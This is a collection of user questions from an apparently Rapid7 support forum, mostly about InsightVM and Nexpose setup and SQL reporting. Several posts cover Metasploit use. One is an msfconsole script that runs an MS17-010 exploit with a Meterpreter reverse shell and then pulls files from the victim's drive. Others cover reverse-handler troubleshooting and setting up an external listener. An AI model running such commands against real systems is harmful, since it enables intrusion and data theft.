With InsightVM, I could easily integrate with ServiceNow within a Remediation Project. However, there are a lot of things to configure, such as "Ticketing Project and Field Mapping". I read through the link below, but there is not enough information. https://insightvm.help.rapid7.com/v1.0/docs/ticketing-integration-for-remediation-workflow-projects Could anyone help me with what I should input in each blank setting, or point me to any document other than the above link? Regards
Posted by Takayuki Murai about a year ago
Hello, I was playing around with ngrok and Metasploit and my virtual machines. I have a problem with the reverse TCP exploit: it doesn't give the Meterpreter payload.

    [-] Handler failed to bind to ip of ngrok ip :4444:-
    [*] Started reverse TCP handler on 0.0.0.0:4444
    [-] Exploit aborted due to failure: unknown: remote ip :8080 - Error retrieving table prefix
    [*] Exploit completed, but no session was created.

Is ngrok worth it for this purpose? What should I do? Thank you
Posted by noah botello about a year ago
Hi Support, I have installed the Nexpose console in my AWS VPC environment. I am able to ssh into the instance where the Nexpose console is installed. The service "nexposeconsole" is running. I am trying to connect to the web interface via 443, but the connection was refused. We only have port 80/443 open in this VPC environment. I have changed the server port to "443" in /opt/rapid7/nexpose/nsc/conf/httpd.xml, and restarted the service "nexposeconsole". But it still doesn't work. Is it possible to use 443 as the server port for nexposeconsole? Thanks!
Posted by Chunyong Lin about a year ago
Is there a way to set up a connection to a private Docker Registry in InsightVM without a username and password? Our private registry does not use username/password for internal hosts and the documentation does not say that they are required for connections to private registries (https://insightvm.help.rapid7.com/v1.0/docs/working-with-containers just says "To create your registry connection, you'll need to enter a name, host, and port. Private Docker registries should concatenate the port to the end of the given URI before saving (e.g. google.com:80).") Is the real problem here that the connection is happening straight from the cloud-based InsightVM and not the internal Nexpose Console? It doesn't make a lot of sense to ask customers to open up their private registries to external connections when there is already a console running internally that could be used to funnel that connection to InsightVM.
Posted by Joshua Hill about a year ago
Hi! Could you please help me with a web authentication issue? I am trying to create it using an HTML form, but when I test the form I receive the following error: Authentication failed. Use valid credentials. I observe this trouble with the specific portal. How can I DEBUG this? I could not find any logs related to the creation of web authentication. Thank you!
Posted by Sergey about a year ago
Hello, I am looking for some help generating a SQL query to report on remediated vulnerabilities. Management is asking for the past 6 months' worth of data, but I've only been able to find examples for the past 30 days. My SQL knowledge is minimal, so any help would be greatly appreciated. Thank you!
Posted by Zach Garrow about a year ago
Hi all! I have a question to ask. I want to write a script to exploit a Server 2008 with ms17-010. I use msfconsole -r ms17.rc, and the content of ms17.rc is:

    use exploit/windows/smb/ms17-010-eternablue
    set rhost ip_victim
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost ip_my
    exploit
    download c:\data\* /root/Desktop/

But it just runs up to exploit, and can't execute the command download c:\data\* /root/Desktop/. So my question is: how can I execute the command download c:\data\* /root/Desktop/ automatically? Because I want to build a machine to teach my student. Excuse my bad English!
Posted by Nguyen Hung about a year ago
Dear all, I have a problem with a Nexpose scan. There was an error generated by the application:

    Failed (java.io.IOException: The Nmap exit value is not zero: -1073741819
        at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source)
        at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source)
        at com.rapid7.nexpose.scan.Scan.start(Unknown Source)
        at com.rapid7.nexpose.scan.Scan.run(Unknown Source)
        at java.lang.Thread.run(Thread.java:745) )

When I tried to use nmap in the application directory (C:\Program Files\rapid7\nexpose\nse\nmap), there was an error "Nmap has stopped working". So what is the main cause of this problem? Rgds, Zaini
Posted by Zaini Maulana about a year ago
When adding a file location for a DNS event source it gives me an error: DNS File does not exist - /opt/rapid7/collector/\\164.... (my DNS Server and file location). Where is the /opt/rapid7/collector being inserted? Better question is why?
Posted by Russ Verbofsky about a year ago
I am running InsightIDR on an Ubuntu server and getting this error on the collector in InsightIDR: "The hostname has not been set to a fully qualified domain name for this collector. Endpoints will not be able to use this collector to communicate." The server host name is a FQDN. Where is the issue and how do I correct it?
Posted by Russ Verbofsky about a year ago
Hi, I'm scanning a French OS with the CIS template. Administrators is Administrateurs in French. Because of that, I have some false checks with CIS, so I would like to modify some checks. I made a copy and after that I opened the files in the directory \\...\custom-policy\... It's not easy to change the files. How can I do this?
Posted by gerard about a year ago
Currently Cross-Site Request Forgery (CSRF) is set to Low in AppSpider. We want to change this to Medium for all our scans. I went into Advanced Options -> AttackPolicyConfig -> AttackPolicyModuleList -> CrossSite Request Forgery (CSRF) -> Severity and set it to Medium. I saved and reran. But the scan is still showing these vulnerabilities as Low. Any ideas?
Posted by chris birely about a year ago
I'm using the query below and filtering based on asset group (ex: servers, clients, or net gear) and need to add a column that shows total assets for each site. Is that possible, if so how?

    SELECT ds.name, dsc.finished AS last_scanned, dss.description, fs.vulnerabilities,
           fs.critical_vulnerabilities, fs.moderate_vulnerabilities, fs.malware_kits,
           fs.exploits, fs.riskscore
    FROM fact_site fs
    JOIN dim_site ds USING (site_id)
    JOIN dim_scan dsc ON ds.last_scan_id = dsc.scan_id
    JOIN dim_scan_status dss USING (status_id)
    ORDER BY ds.name ASC
Posted by Doug Schaible about a year ago
We have over a thousand printers and, when scanned on port 9100, many of them print out 10 pages of garbage. How do other people handle this? I'm being asked by the help desk and the networking team to just "not scan port 9100 or exclude all printers from scans" but that is a terrible solution that increases our risk level. At the same time, wasting 5,000 sheets of paper a day and wasting people's time is a terrible solution.
Posted by Jasey DePriest about a year ago
I just want to check the status of questions I've already asked, but I have to ask a new question to be able to log in. Why isn't there a profile or account page for users? Why don't I have a dashboard that can easily show me questions I've asked, tried to answer, or just "liked"?
Posted by Jasey DePriest about a year ago
Hello, Can someone please give me a hand updating the SQL query below to include the last scan date associated with each asset in the SQL query below?

    WITH assets_scanned_today AS (
        SELECT DISTINCT(asset_id)
        FROM dim_asset_scan
        WHERE scan_finished > (NOW() - INTERVAL '27 hours')
    )
    SELECT dt.tag_name AS tag_name, da.asset_id, da.ip_address, sites AS name,
           COALESCE(da.host_name, 'R7-DEV-ID-' || da.asset_id) devicename,
           da.mac_address, dos.description AS operating_system
    FROM dim_asset da
    JOIN dim_tag_asset USING (asset_id)
    JOIN dim_scope_tag USING (tag_id)
    JOIN dim_tag dt USING (tag_id)
    JOIN dim_operating_system dos USING (operating_system_id)
    JOIN dim_site_asset sa USING (asset_id)
    WHERE asset_id IN (SELECT asset_id FROM assets_scanned_today)
    ORDER BY dt.tag_name, da.ip_address
Posted by Chad Viola about a year ago
I am fairly new to Metasploit (and subsequently Meterpreter) so please bear that in mind in your response. I have root access to a VPS with a dedicated IP address. In this scenario, the target machine is running Windows and is inside a remote network. Setting aside the logistics of firewalls and AV software, is there a way to use my VPS as a static point of connection (listener?) for Meterpreter? Or is it possible to use my VPS as just a passthrough for Meterpreter, where the intended endpoint is the attacker's private network? I took a look at an article that talks about using portfwd in Meterpreter but it appears as though I would have to have Meterpreter installed on my VPS in order to use portfwd...? Any and all knowledge/advice/criticism/expertise are welcomed and thanked. Tony
Posted by Tony W about a year ago